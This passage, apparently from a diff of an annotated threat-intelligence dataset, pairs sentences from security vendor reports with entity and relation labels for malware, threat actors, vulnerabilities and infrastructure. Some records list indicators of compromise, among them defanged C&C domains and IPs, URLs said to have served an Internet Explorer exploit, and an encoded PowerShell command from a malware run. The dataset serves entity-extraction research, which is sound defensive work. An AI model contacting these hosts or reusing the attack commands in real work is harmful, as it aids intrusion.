3.","entities":[],"relations":[],"Comments":[]} +{"id":634,"text":" The latest version of the Petya ransomware is spreading over Windows SMB and is reportedly using the ETERNALBLUE exploit tool, which exploits CVE-2017-0144 and was originally released by the Shadow Brokers group in April 2017.","entities":[{"id":2111,"label":"malware","start_offset":27,"end_offset":32},{"id":2113,"label":"malware","start_offset":102,"end_offset":113},{"id":2116,"label":"threat-actor","start_offset":188,"end_offset":206},{"id":46221,"label":"SOFTWARE","start_offset":62,"end_offset":73},{"id":46222,"label":"vulnerability","start_offset":143,"end_offset":156},{"id":46223,"label":"TIME","start_offset":216,"end_offset":226}],"relations":[{"id":171,"from_id":2111,"to_id":46222,"type":"exploits"},{"id":170,"from_id":2111,"to_id":46221,"type":"targets"},{"id":172,"from_id":2116,"to_id":2113,"type":"authored-by"},{"id":173,"from_id":46222,"to_id":46221,"type":"targets"}],"Comments":[]} +{"id":168,"text":" From an engineering point of view, this sole, specific targeting of files that matter significantly increases the chances of ransomware\u2019s success.","entities":[],"relations":[],"Comments":[]} +{"id":2723,"text":" This vulnerability exists within the Microsoft Server Message Block 3.0 (SMBv3), specifically regarding malformed compression headers.","entities":[{"id":47964,"label":"SOFTWARE","start_offset":39,"end_offset":81}],"relations":[],"Comments":[]} +{"id":793,"text":" For the foreseeable future, Microsoft may introduce more defensive mechanisms against use-after-free bugs or even heap fengshui to reduce the risk of being exploited.","entities":[{"id":46354,"label":"identity","start_offset":29,"end_offset":38}],"relations":[],"Comments":[]} +{"id":13522,"text":"The US Department of Energy (DOE) recently launched the Operational Technology (OT) Defender Fellowship.","entities":[{"id":51581,"label":"identity","start_offset":4,"end_offset":33}],"relations":[],"Comments":[]} +{"id":5412,"text":"In the case of Cyclops Blink, we received samples targeting Asus routers that were not previously reported on.","entities":[{"id":51416,"label":"malware","start_offset":15,"end_offset":28}],"relations":[],"Comments":[]} +{"id":8965,"text":" Afterward, one more warning about the unverified developer is displayed.","entities":[],"relations":[],"Comments":[]} +{"id":3946,"text":" Execution of arbitrary commands via session id","entities":[],"relations":[],"Comments":[]} +{"id":7305,"text":"OceanLotus commands and descriptions","entities":[{"id":22767,"label":"malware","start_offset":0,"end_offset":10},{"id":22768,"label":"location","start_offset":20,"end_offset":23}],"relations":[],"Comments":[]} +{"id":5446,"text":" What is it?","entities":[],"relations":[],"Comments":[]} +{"id":4985,"text":"We assess with high confidence this vulnerability was sold by an exploit broker and probably abused by more than one surveillance vendor.","entities":[],"relations":[],"Comments":[]} +{"id":1794,"text":"The ADSS JAVA component (C:\\ManageEngine\\ADSelfService Plus\\jre\\bin\\java.exe) executed mshta.exe to remotely run a remotely-hosted HTML application (HTA) file from the attackers\u2019 command and control (C&C) server.","entities":[{"id":45134,"label":"FILEPATH","start_offset":25,"end_offset":76},{"id":45135,"label":"FILEPATH","start_offset":87,"end_offset":96}],"relations":[],"Comments":[]} {"id":8642,"text":"In our environment, we did not receive any payloads past this stage.","entities":[],"relations":[],"Comments":[]} -{"id":8646,"text":"Related IOCs lragir[.]org armradio[.]org asbares[.]com armtimes[.]net armlur[.]org armenpress[.]org hraparak[.]org armtimes[.]org hetq[.]org","entities":[],"relations":[],"Comments":[]} -{"id":8653,"text":"After a fingerprinting phase, similar to the one used with the Chrome exploit above, users were served an Internet Explorer 0-day.","entities":[{"id":26723,"label":"attack-pattern","start_offset":8,"end_offset":22},{"id":26724,"label":"location","start_offset":45,"end_offset":48}],"relations":[],"Comments":[]} -{"id":8656,"text":"We did not recover additional payloads in our environment.","entities":[],"relations":[],"Comments":[]} -{"id":8657,"text":"During our investigation we discovered several documents uploaded to VirusTotal.","entities":[],"relations":[],"Comments":[]} -{"id":8660,"text":"Related IOCs","entities":[],"relations":[],"Comments":[]} -{"id":8661,"text":"Examples of related Office documents uploaded to VirusTotal: https:\/\/www.virustotal.com\/gui\/file\/656d19186795280a068fcb97e7ef821b55ad3d620771d42ed98d22ee3c635e67\/detection https:\/\/www.virustotal.com\/gui\/file\/851bf4ab807fc9b29c9f6468c8c89a82b8f94e40474c6669f105bce91f278fdb\/detection","entities":[{"id":26744,"label":"URL","start_offset":61,"end_offset":171},{"id":26745,"label":"SHA1","start_offset":172,"end_offset":282}],"relations":[],"Comments":[]} -{"id":8662,"text":"Unique URLs serving ​​CVE-2021-33742 Internet Explorer exploit: http:\/\/lioiamcount[.]com\/IsnoMLgankYg6\/EjlYIy7cdFZFeyFqE4IURS1 http:\/\/db-control-uplink[.]com\/eFe1J00hISDe9Zw\/gzHvIOlHpIXB http:\/\/kidone[.]xyz\/VvE0yYArmvhyTl\/GzV","entities":[{"id":26746,"label":"URL","start_offset":64,"end_offset":88},{"id":26747,"label":"URL","start_offset":127,"end_offset":136},{"id":26748,"label":"URL","start_offset":187,"end_offset":206}],"relations":[],"Comments":[]} -{"id":8663,"text":"Word documents with the following classid: {EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B} Related infrastructure: workaj[.]com wordzmncount[.]com Not all attacks require chaining multiple 0-day exploits to be successful.","entities":[],"relations":[],"Comments":[]} -{"id":8665,"text":"(NOTE: This exploit is not connected to the other three we’ve discussed above.)","entities":[],"relations":[],"Comments":[]} -{"id":8671,"text":"The victim would need to have a session open on these websites from Safari for cookies to be successfully exfiltrated.","entities":[],"relations":[],"Comments":[]} -{"id":8672,"text":"There was no sandbox escape or implant delivered via this exploit.","entities":[],"relations":[],"Comments":[]} -{"id":8673,"text":"The exploit targeted iOS versions 12.4 through 13.7.","entities":[],"relations":[],"Comments":[]} -{"id":8675,"text":"Related IOCs supportcdn.web[.]app vegmobile[.]com 111.90.146[.]198","entities":[{"id":26782,"label":"IPV4","start_offset":50,"end_offset":66}],"relations":[],"Comments":[]} -{"id":8683,"text":"Increased Utilization","entities":[],"relations":[],"Comments":[]} -{"id":8690,"text":"In the mid-to-late 2010s, more private companies have joined the marketplace selling these 0-day capabilities.","entities":[],"relations":[],"Comments":[]} -{"id":8691,"text":"No longer do groups need to have the technical expertise, now they just need resources.","entities":[{"id":26836,"label":"identity","start_offset":67,"end_offset":71}],"relations":[],"Comments":[]} +{"id":14356,"text":"Two months later, the C&C server was changed to hxxp:\/\/miakhalifagame[.]com.","entities":[{"id":51789,"label":"URL","start_offset":48,"end_offset":75}],"relations":[],"Comments":[]} +{"id":5705,"text":"This script was designed to show a social engineering message \u2014 typically a Flash update popup or a DNS error (note that Adobe discontinued Flash Player at the end of December 2020) that then instructed the visitor to download a malicious file that turned out to be a Cobalt Strike loader.","entities":[],"relations":[],"Comments":[]} +{"id":731,"text":"Additionally, Prisma Cloud users can also build a custom vulnerability detection rule to identify if any system is running an OMI package with a version previous to 1.6.8.1.","entities":[{"id":46314,"label":"SOFTWARE","start_offset":14,"end_offset":26},{"id":46315,"label":"SOFTWARE","start_offset":126,"end_offset":129}],"relations":[],"Comments":[]} +{"id":4552,"text":"This is the first known instance of Turla distributing Android-related malware.","entities":[{"id":50361,"label":"threat-actor","start_offset":36,"end_offset":41},{"id":50362,"label":"SOFTWARE","start_offset":55,"end_offset":62}],"relations":[{"id":949,"from_id":50361,"to_id":50362,"type":"targets"}],"Comments":[]} +{"id":7732,"text":"Enabling the macros of the Excel file downloads a file created using NSIS installer with ServHelper from 79[.]141[.]168[.]105 or 195[.]123[.]213[.]126.","entities":[{"id":24012,"label":"malware","start_offset":69,"end_offset":73},{"id":24013,"label":"tools","start_offset":89,"end_offset":99},{"id":24014,"label":"IPV4","start_offset":105,"end_offset":125},{"id":24015,"label":"IPV4","start_offset":129,"end_offset":150}],"relations":[],"Comments":[]} +{"id":2171,"text":"Palo Alto Networks and Unit 42 will continue to monitor for evidence of exploitation and further novel use cases.","entities":[{"id":47305,"label":"identity","start_offset":0,"end_offset":18},{"id":47306,"label":"identity","start_offset":23,"end_offset":30}],"relations":[],"Comments":[]} +{"id":9787,"text":"Apart from knowledge and awareness of phishing and social engineering, it is also important to be prepared with effective and layered security solutions.","entities":[{"id":29806,"label":"location","start_offset":21,"end_offset":24},{"id":29807,"label":"attack-pattern","start_offset":38,"end_offset":46},{"id":29808,"label":"location","start_offset":47,"end_offset":50},{"id":29809,"label":"location","start_offset":122,"end_offset":125},{"id":29810,"label":"location","start_offset":134,"end_offset":142}],"relations":[],"Comments":[]} +{"id":14332,"text":"The adult game first used by the attackers was also found in the list of games advertised by hxxp:\/\/www[.]roundyearfun[.]org Our analysis revealed that hxxp:\/\/www[.]roundyearfun[.]org was also used as a C&C address to save victims\u2019 data.","entities":[{"id":48560,"label":"Infrastucture","start_offset":202,"end_offset":207},{"id":48558,"label":"URL","start_offset":93,"end_offset":124},{"id":48559,"label":"URL","start_offset":152,"end_offset":183}],"relations":[],"Comments":[]} +{"id":977,"text":"We have captured over 18,000 samples that contain the SMS stealing library since August 2015, meaning the number of affected users is considerable.","entities":[{"id":46473,"label":"TIME","start_offset":81,"end_offset":92},{"id":46474,"label":"attack-pattern","start_offset":54,"end_offset":66}],"relations":[],"Comments":[]} +{"id":13862,"text":"Apart from locking Colonial Pipeline\u2019s computer systems, DarkSide also stole over 100 GB of corporate data.","entities":[{"id":42986,"label":"threat-actor","start_offset":57,"end_offset":65}],"relations":[],"Comments":[]} +{"id":14102,"text":"Figure 12 shows a comparison between the two samples.","entities":[],"relations":[],"Comments":[]} +{"id":2731,"text":"For client mitigation, recommend creating an outbound firewall rule to block SMB outbound on public and private interfaces.","entities":[{"id":47973,"label":"SOFTWARE","start_offset":77,"end_offset":80}],"relations":[],"Comments":[]} +{"id":9737,"text":"Our analysis revealed that they drop a new backdoor, which is written in PowerShell as MuddyWater\u2019s known POWERSTATS backdoor.","entities":[{"id":29706,"label":"attack-pattern","start_offset":73,"end_offset":83},{"id":29708,"label":"malware","start_offset":106,"end_offset":116}],"relations":[],"Comments":[]} +{"id":1323,"text":"The following information is collected:","entities":[],"relations":[],"Comments":[]} +{"id":7799,"text":"Conclusion","entities":[],"relations":[],"Comments":[]} +{"id":10549,"text":"Google\u2019s Threat Analysis Group (TAG) is a specialized team of security experts that works to identify, report, and stop government-backed phishing and hacking against Google and the people who use our products.","entities":[{"id":32158,"label":"location","start_offset":62,"end_offset":70},{"id":32159,"label":"location","start_offset":111,"end_offset":114},{"id":32160,"label":"location","start_offset":115,"end_offset":119},{"id":32161,"label":"attack-pattern","start_offset":138,"end_offset":146},{"id":32162,"label":"location","start_offset":147,"end_offset":150},{"id":32164,"label":"location","start_offset":174,"end_offset":177}],"relations":[],"Comments":[]} +{"id":1939,"text":"For one, there is the domain pikrpro[.]eu and its subdomains\u2014the islamicfinderfeedback[.]pikrpro[.]eu and the memrifilesforinfo[.]pikpro[.]eu.","entities":[{"id":47063,"label":"DOMAIN","start_offset":110,"end_offset":141},{"id":47061,"label":"DOMAIN","start_offset":29,"end_offset":41},{"id":47062,"label":"DOMAIN","start_offset":65,"end_offset":101}],"relations":[],"Comments":[]} +{"id":8570,"text":"Although Play Store users were protected, we are highlighting the app here as TAG has seen APT35 attempt to distribute this spyware on other platforms as recently as July 2021.","entities":[{"id":26484,"label":"location","start_offset":45,"end_offset":48},{"id":26485,"label":"threat-actor","start_offset":91,"end_offset":96}],"relations":[],"Comments":[]} +{"id":13687,"text":"We found a BEC mail sample that was sent from the same IP.","entities":[],"relations":[],"Comments":[]} +{"id":718,"text":"Unit 42 recommends customers upgrade to the latest release of Confluence Server and Data Center.","entities":[{"id":46285,"label":"identity","start_offset":0,"end_offset":7},{"id":46286,"label":"SOFTWARE","start_offset":62,"end_offset":95}],"relations":[],"Comments":[]} +{"id":916,"text":" After it finished the encryption routine, PClock2 generates a VBScript file in the following directory:","entities":[{"id":46437,"label":"malware","start_offset":43,"end_offset":50},{"id":46438,"label":"SOFTWARE","start_offset":63,"end_offset":71}],"relations":[],"Comments":[]} +{"id":10043,"text":"One of the files, rsync, is an initially obfuscated Perl-based Shellbot capable of multiple backdoor commands such as file downloading, shell cmd execution, and DDoS. Figure 4. Obfuscated Perl script Figure 5.","entities":[{"id":30647,"label":"location","start_offset":0,"end_offset":3},{"id":30648,"label":"location","start_offset":52,"end_offset":56},{"id":30649,"label":"location","start_offset":136,"end_offset":141},{"id":30650,"label":"malware","start_offset":142,"end_offset":145},{"id":30651,"label":"location","start_offset":157,"end_offset":160},{"id":30653,"label":"location","start_offset":189,"end_offset":193}],"relations":[],"Comments":[]} +{"id":1881,"text":"BAT.KILLAV.YACAA","entities":[],"relations":[],"Comments":[]} +{"id":13626,"text":"Communication with C&C uses sockets and is encrypted with simple SUB 0x46, XOR 0x19 encryption.","entities":[],"relations":[],"Comments":[]} +{"id":2215,"text":" The downloaded file is dropped to the system32 folder.","entities":[{"id":47321,"label":"FILEPATH","start_offset":39,"end_offset":47}],"relations":[],"Comments":[]} +{"id":3653,"text":"It also takes spear phishing attacks to a level that makes it nearly impossible to distinguish an attack email from a legitimate email.","entities":[{"id":11070,"label":"attack-pattern","start_offset":14,"end_offset":28}],"relations":[],"Comments":[]} +{"id":7810,"text":"As they continue to target businesses in different sectors, we can expect TA505 to keep using phishing and social engineering techniques to compromise systems.","entities":[{"id":24197,"label":"location","start_offset":20,"end_offset":26},{"id":24198,"label":"location","start_offset":63,"end_offset":66},{"id":24200,"label":"attack-pattern","start_offset":94,"end_offset":102},{"id":24201,"label":"location","start_offset":103,"end_offset":106}],"relations":[],"Comments":[]} +{"id":1379,"text":"Two instances of PowerShell are spawned with an encoded command to sleep for 10 seconds, e.g. C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== 3.","entities":[{"id":46711,"label":"FILEPATH","start_offset":94,"end_offset":151},{"id":46712,"label":"tools","start_offset":17,"end_offset":27}],"relations":[],"Comments":[]} +{"id":1435,"text":"When an app is published to the Google Play Store, the certificate information is included within the APK file.","entities":[{"id":46767,"label":"SOFTWARE","start_offset":32,"end_offset":49}],"relations":[],"Comments":[]} +{"id":3233,"text":" If the file (that is, the marker) is not found, the backdoor creates a new one and writes the current timestamp onto it.","entities":[],"relations":[],"Comments":[]} +{"id":1942,"text":"The decoy documents tell more about Urpage's possible targets, as it contains text from articles about the region of Kashmir.","entities":[{"id":47066,"label":"threat-actor","start_offset":36,"end_offset":42},{"id":47067,"label":"location","start_offset":117,"end_offset":124}],"relations":[{"id":300,"from_id":47066,"to_id":47067,"type":"targets"}],"Comments":[]} +{"id":931,"text":"AutoFocus users can find more information on samples and indicators related to this attack by viewing the PClock tag.","entities":[{"id":46448,"label":"malware","start_offset":106,"end_offset":112}],"relations":[],"Comments":[]} +{"id":1475,"text":" We\u2019ve contacted the developer to confirm they have retained sole custody of the keys.","entities":[],"relations":[],"Comments":[]} +{"id":1485,"text":"Again, using the same private key is probably due to the convenience in app management.","entities":[],"relations":[],"Comments":[]} +{"id":7736,"text":"Similar to the routine variant in Figure 6, the Excel VBA macros retrieve the FlawedAmmyy downloader from hxxp:\/\/195[.]123[.]245[.]185\/r1 or hxxp:\/\/185[.]225[.]17[.]5\/r1, in then decrypts and executes FlawedAmmyy RAT from hxxp:\/\/185[.]225[.]17[.]5\/2.dat or hxxp:\/\/195[.]123[.]245[.]185\/1.dat.","entities":[{"id":24027,"label":"location","start_offset":48,"end_offset":53},{"id":24028,"label":"malware","start_offset":78,"end_offset":89},{"id":24029,"label":"location","start_offset":188,"end_offset":191},{"id":24030,"label":"malware","start_offset":201,"end_offset":212}],"relations":[],"Comments":[]} +{"id":10859,"text":"tfsdne:","entities":[],"relations":[],"Comments":[]} +{"id":1023,"text":"The price for this custom account was only \u00a527 RMB ($4.40 USD); for an extra \u00a513 RMB ($2.12 USD), the buyer can request a custom username at any subdomain for the given institution.","entities":[],"relations":[],"Comments":[]} +{"id":893,"text":" Figure 4. HTTP POST request containing file paths of malware After installation, PClock2 will also set the following registry key with a value of \u2018INSTALL_OK\u2019.","entities":[{"id":46422,"label":"malware","start_offset":83,"end_offset":90}],"relations":[],"Comments":[]} +{"id":3954,"text":"Credential access","entities":[],"relations":[],"Comments":[]} +{"id":14211,"text":"The malware we analyzed is separated in two files: a loader, and the payload.","entities":[],"relations":[],"Comments":[]} +{"id":13548,"text":"The question asked on a forum showing the payload related to Water Pamola.","entities":[{"id":51624,"label":"campaign","start_offset":61,"end_offset":73}],"relations":[],"Comments":[]} +{"id":4455,"text":"TAG tracks and proactively counters serious state-sponsored and financially motivated information cyber criminal activities, such as hacking and the use of spyware.","entities":[{"id":50232,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} +{"id":231,"text":"A phishing webpage targeting a Ukrainian state administration employee, detected by our in-house machine learning models on March 16.Our teams at Palo Alto Networks are actively monitoring the phishing landscape surrounding Ukraine-related URLs and are sharing this threat intelligence with relevant authorities in Ukraine and internationally.","entities":[{"id":765,"label":"attack-pattern","start_offset":2,"end_offset":10},{"id":771,"label":"attack-pattern","start_offset":193,"end_offset":201},{"id":44647,"label":"identity","start_offset":31,"end_offset":70},{"id":44648,"label":"TIME","start_offset":124,"end_offset":132},{"id":44649,"label":"identity","start_offset":146,"end_offset":164},{"id":44650,"label":"location","start_offset":315,"end_offset":322}],"relations":[{"id":135,"from_id":765,"to_id":44647,"type":"targets"},{"id":136,"from_id":771,"to_id":44650,"type":"targets"}],"Comments":[]} +{"id":4223,"text":"The application is a simple downloader that sends some basic information (username, antivirus, IP address, and operating system version) encrypted using triple Data Encryption Standard (DES). Figure 4.","entities":[],"relations":[],"Comments":[]} +{"id":2809,"text":"Unit 42 is not aware of any reports where paying the ransom to the WanaCrypt0r attackers has resulted in the recovery of data.","entities":[{"id":48028,"label":"identity","start_offset":0,"end_offset":7},{"id":8587,"label":"malware","start_offset":67,"end_offset":78}],"relations":[],"Comments":[]} +{"id":14377,"text":"On one end of the spectrum are places like universities that maybe manage 10% of the endpoints on their network.","entities":[],"relations":[],"Comments":[]} +{"id":4543,"text":"While we continue to fight these threats on a technical level, the providers of these capabilities operate openly in democratic countries.","entities":[],"relations":[],"Comments":[]} +{"id":2580,"text":"This post is also available in: \u65e5\u672c\u8a9e (Japanese) The Lapsus$ Group threat actor has grown in just a few months from launching a handful of destructive attacks to stealing and publishing source code of multiple top-tier technology companies.","entities":[{"id":45601,"label":"threat-actor","start_offset":57,"end_offset":64}],"relations":[],"Comments":[]} +{"id":13593,"text":"The script for modifying the shop page header to inject a web shell","entities":[{"id":51682,"label":"malware","start_offset":4,"end_offset":10}],"relations":[],"Comments":[]} +{"id":8391,"text":"In December 2021, we released research about novel techniques used by NSO Group to compromise iMessage users.","entities":[],"relations":[],"Comments":[]} +{"id":4522,"text":"Google manages a vulnerability rewards program (VRP), rewarding researchers millions of dollars for their contributions in securing our devices and platforms.","entities":[{"id":50320,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} +{"id":1419,"text":"While we haven\u2019t seen any indication that the spam volume has begun to slow down, we do expect the campaign to wind down in the next 24 hours, but a new campaign will probably be close behind.","entities":[{"id":4262,"label":"TIME","start_offset":124,"end_offset":141}],"relations":[],"Comments":[]} +{"id":3527,"text":"We also found that these versions encrypt the communication to its C&C servers.","entities":[],"relations":[],"Comments":[]} +{"id":2571,"text":"We\u2019ve recently published a new Unit 42 white paper on credential theft that we encourage you to read.","entities":[{"id":45597,"label":"identity","start_offset":31,"end_offset":38},{"id":45598,"label":"attack-pattern","start_offset":54,"end_offset":70}],"relations":[],"Comments":[]} +{"id":9231,"text":"CISA ordered government agencies to patch now or disconnect their on-premises Exchange servers.","entities":[],"relations":[],"Comments":[]} +{"id":11688,"text":" The following table shows their targets, related phishing domains, and lure documents used in each of the phishing attacks. Date Phishing Domain Targeted Organization Targeted Mail server Redirection after login 2019 Nov Government of Nepal mail.nepal.gov.np Redirect to file \u201cIMG_0002.pdf\u201d 2019 Nov Ministry of Defence, Nepal mail.mod.gov.np Redirect to original mail server 2019 Dec mail-","entities":[{"id":35857,"label":"attack-pattern","start_offset":50,"end_offset":58},{"id":35858,"label":"location","start_offset":68,"end_offset":71},{"id":35859,"label":"location","start_offset":72,"end_offset":76},{"id":35860,"label":"attack-pattern","start_offset":107,"end_offset":115},{"id":35861,"label":"location","start_offset":126,"end_offset":130},{"id":35862,"label":"attack-pattern","start_offset":132,"end_offset":140},{"id":35864,"label":"location","start_offset":246,"end_offset":251},{"id":35867,"label":"location","start_offset":339,"end_offset":344}],"relations":[],"Comments":[]} +{"id":158,"text":"This was well-intentioned but ultimately backfired: users got fed up clicking \u201cAre you sure?\u201d dialog boxes and quickly disabled the feature, or just mindlessly clicked \u201cOK\u201d every time they saw it.","entities":[],"relations":[],"Comments":[]} +{"id":10957,"text":"And as others have reported, we\u2019re seeing a resurgence in COVID-related hacking and phishing attempts from numerous commercial and government-backed attackers.","entities":[{"id":33324,"label":"location","start_offset":0,"end_offset":3},{"id":33325,"label":"location","start_offset":80,"end_offset":83},{"id":33326,"label":"attack-pattern","start_offset":84,"end_offset":92},{"id":33327,"label":"location","start_offset":127,"end_offset":130}],"relations":[],"Comments":[]} +{"id":9698,"text":"Scrambling \u2018Mac OSX 10.12\u2019 Encryption","entities":[],"relations":[],"Comments":[]} +{"id":14073,"text":"However, these are not the only commonalities.","entities":[],"relations":[],"Comments":[]} +{"id":14171,"text":"With bipartisan support, the decision was made to deprive the Putin regime of the economic resources needed to wage war in Ukraine.","entities":[{"id":48215,"label":"identity","start_offset":62,"end_offset":68},{"id":48216,"label":"location","start_offset":123,"end_offset":130}],"relations":[],"Comments":[]} +{"id":13721,"text":"And since the API hooking shellcode adopts a generic approach, a similar code snippet might be used to target other products in the future and make Waterbear harder to detect.","entities":[{"id":42665,"label":"location","start_offset":0,"end_offset":3},{"id":42666,"label":"attack-pattern","start_offset":18,"end_offset":25},{"id":42667,"label":"location","start_offset":103,"end_offset":109},{"id":42668,"label":"location","start_offset":139,"end_offset":142}],"relations":[],"Comments":[]} +{"id":8739,"text":"We terminated 12 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to Russia.","entities":[],"relations":[],"Comments":[]} +{"id":6857,"text":"It was last updated on May 27, 2020.","entities":[],"relations":[],"Comments":[]} +{"id":3468,"text":"Marade will check if the infected host can connect to the internet and if it is installed with anti-virus (AV) software.","entities":[{"id":49266,"label":"malware","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} +{"id":2578,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} +{"id":13002,"text":"There were no accounts compromised from this campaign and Google will alert all targeted users of these attempts through our monthly government-backed attacker warnings.","entities":[],"relations":[],"Comments":[]} +{"id":6103,"text":" Of note, three of the Google Code projects associated with the newly uncovered account were added during the past few days, indicating it is still in active use. Below is a current screenshot of the newly uncovered Google Code account\u2019s projects.","entities":[],"relations":[],"Comments":[]} +{"id":11740,"text":"We blocked 1.6M messages to targets, displayed ~62K Safe Browsing phishing page warnings, blocked 2.4K files, and successfully restored ~4K accounts.","entities":[{"id":36187,"label":"location","start_offset":52,"end_offset":56},{"id":36188,"label":"attack-pattern","start_offset":66,"end_offset":74},{"id":36189,"label":"location","start_offset":75,"end_offset":79},{"id":36192,"label":"location","start_offset":110,"end_offset":113}],"relations":[],"Comments":[]} +{"id":2969,"text":"Even though not all devices can use password managers directly, it\u2019s still one of the best things you can set up.","entities":[],"relations":[],"Comments":[]} +{"id":2895,"text":"= 3096481936;","entities":[],"relations":[],"Comments":[]} +{"id":4169,"text":"Right: TClient)","entities":[{"id":12519,"label":"malware","start_offset":7,"end_offset":14}],"relations":[],"Comments":[]} +{"id":5282,"text":"This list aims to aid cybersecurity defenders in searching for affected devices in their networks and starting the remediation process.","entities":[],"relations":[],"Comments":[]} +{"id":4667,"text":"A log file is written containing a count of the emails that were downloaded.","entities":[],"relations":[],"Comments":[]} +{"id":465,"text":" Even then, taking down sites that malware using a DGA can be a challenge as defenders have to go through the process of working with ISPs to take down these malicious domains one by one.","entities":[{"id":46124,"label":"identity","start_offset":134,"end_offset":137}],"relations":[],"Comments":[]} +{"id":5035,"text":"In mid-April, TAG detected a Ghostwriter credential phishing campaign targeting Facebook users.","entities":[{"id":51105,"label":"TIME","start_offset":3,"end_offset":12},{"id":51106,"label":"identity","start_offset":14,"end_offset":17},{"id":51107,"label":"threat-actor","start_offset":29,"end_offset":40},{"id":51108,"label":"SOFTWARE","start_offset":80,"end_offset":88}],"relations":[],"Comments":[]} +{"id":1745,"text":"In recent research, we found attackers were using fake versions of some well-known and well-trusted sites:","entities":[],"relations":[],"Comments":[]} +{"id":9930,"text":"First seen Last seen 5.135.120.57 12\/4\/18 1\/24\/19 5.135.199.25 3\/3\/19 3\/3\/19 31.7.62.48 9\/26\/18 9\/29\/18 51.77.11.46 7\/1\/19 7\/2\/19 54.36.73.108 7\/22\/19 10\/05\/19 54.37.48.172 10\/22\/19 11\/05\/19 54.38.124.150 10\/28\/18 11\/17\/18 88.150.221.107 9\/26\/19 11\/07\/19 91.134.203.59 9\/26\/18 12\/4\/18 109.169.89.103 12\/2\/18 12\/14\/18 109.200.24.114 11\/19\/18 12\/25\/18 137.74.80.220 9\/29\/18 10\/23\/18 137.74.157.84 12\/18\/18 10\/21\/19 185.122.56.232 9\/29\/18 11\/4\/18 185.125.204.57 10\/25\/18 1\/14\/19 185.175.138.173 1\/19\/19 1\/22\/19 188.165.119.138 10\/8\/18 11\/19\/18 193.70.71.112 3\/7\/19 3\/17\/19 195.154.41.72 1\/13\/19 1\/20\/19 213.32.113.159 6\/30\/19 9\/16\/19 216.244.93.137 12\/10\/18 12\/21\/18 Table 3.","entities":[{"id":30295,"label":"IPV4","start_offset":22,"end_offset":34},{"id":30296,"label":"IPV4","start_offset":51,"end_offset":63},{"id":30297,"label":"IPV4","start_offset":78,"end_offset":88},{"id":30298,"label":"IPV4","start_offset":105,"end_offset":116},{"id":30299,"label":"IPV4","start_offset":131,"end_offset":143},{"id":30300,"label":"IPV4","start_offset":161,"end_offset":173},{"id":30301,"label":"IPV4","start_offset":192,"end_offset":205},{"id":30302,"label":"IPV4","start_offset":224,"end_offset":238},{"id":30303,"label":"IPV4","start_offset":256,"end_offset":269},{"id":30304,"label":"IPV4","start_offset":286,"end_offset":300},{"id":30305,"label":"IPV4","start_offset":318,"end_offset":332},{"id":30306,"label":"IPV4","start_offset":351,"end_offset":364},{"id":30307,"label":"IPV4","start_offset":382,"end_offset":395},{"id":30308,"label":"IPV4","start_offset":414,"end_offset":428},{"id":30309,"label":"IPV4","start_offset":445,"end_offset":459},{"id":30310,"label":"IPV4","start_offset":477,"end_offset":492},{"id":30311,"label":"IPV4","start_offset":509,"end_offset":524},{"id":30312,"label":"IPV4","start_offset":542,"end_offset":555},{"id":30313,"label":"IPV4","start_offset":571,"end_offset":584},{"id":30314,"label":"IPV4","start_offset":601,"end_offset":615},{"id":30315,"label":"IPV4","start_offset":632,"end_offset":646}],"relations":[],"Comments":[]} +{"id":166,"text":"Extra layers of protection for those files would be incredibly onerous.","entities":[],"relations":[],"Comments":[]} +{"id":8041,"text":"When they did, attackers sent them phishing links in follow-on correspondence.","entities":[{"id":24947,"label":"location","start_offset":30,"end_offset":34},{"id":24948,"label":"attack-pattern","start_offset":35,"end_offset":43}],"relations":[],"Comments":[]} +{"id":1479,"text":"In addition to our research, the Baidu Security team in China recently found 23 mobile banking apps sharing the same certificate hosted by a third party app developer and reported the discovery to the CNCERT in China.","entities":[{"id":45023,"label":"location","start_offset":56,"end_offset":61},{"id":45025,"label":"location","start_offset":211,"end_offset":216},{"id":45026,"label":"identity","start_offset":201,"end_offset":207},{"id":45024,"label":"identity","start_offset":33,"end_offset":52}],"relations":[{"id":58,"from_id":45026,"to_id":45025,"type":"located-at"},{"id":219,"from_id":45024,"to_id":45023,"type":"located-at"}],"Comments":[]} +{"id":13956,"text":"Organizations therefore need to take the time to put in place an incident response plan focused on the new model of ransomware attacks.","entities":[],"relations":[],"Comments":[]} +{"id":10779,"text":"Due to the suspicious nature of this activity, we decided to investigate further.","entities":[],"relations":[],"Comments":[]} +{"id":13532,"text":"King added that this DOE initiative will better protect the US from cyberattacks.","entities":[{"id":51595,"label":"identity","start_offset":0,"end_offset":4},{"id":51596,"label":"location","start_offset":60,"end_offset":62}],"relations":[],"Comments":[]} +{"id":3862,"text":"If the user clicks on the \u201cNo\u201d button, malicious activity will not initiate.","entities":[],"relations":[],"Comments":[]} +{"id":924,"text":"Ransom demand ","entities":[],"relations":[],"Comments":[]} +{"id":3654,"text":"And so technological prevention controls (patching, robust security) are even more for effective prevention.","entities":[],"relations":[],"Comments":[]} +{"id":2285,"text":"Parallel to the analysis, tracking, and technical disruption of this botnet, Google has filed a lawsuit against two individuals believed to be located in Russia for operating the Glupteba Botnet and its various criminal schemes.","entities":[{"id":47357,"label":"identity","start_offset":77,"end_offset":83},{"id":47356,"label":"malware","start_offset":179,"end_offset":187},{"id":47358,"label":"location","start_offset":154,"end_offset":160}],"relations":[{"id":314,"from_id":47356,"to_id":47358,"type":"located-at"}],"Comments":[]} +{"id":3254,"text":"The BPS backdoor global configuration variable The backdoor communicates with the C&C server using the Socket.io protocol.","entities":[{"id":48370,"label":"malware","start_offset":4,"end_offset":16}],"relations":[],"Comments":[]} +{"id":932,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} +{"id":8512,"text":"The actors behind this campaign, which we attribute to a group of hackers recruited in a Russian-speaking forum, lure their target with fake collaboration opportunities (typically a demo for anti-virus software, VPN, music players, photo editing or online games), hijack their channel, then either sell it to the highest bidder or use it to broadcast cryptocurrency 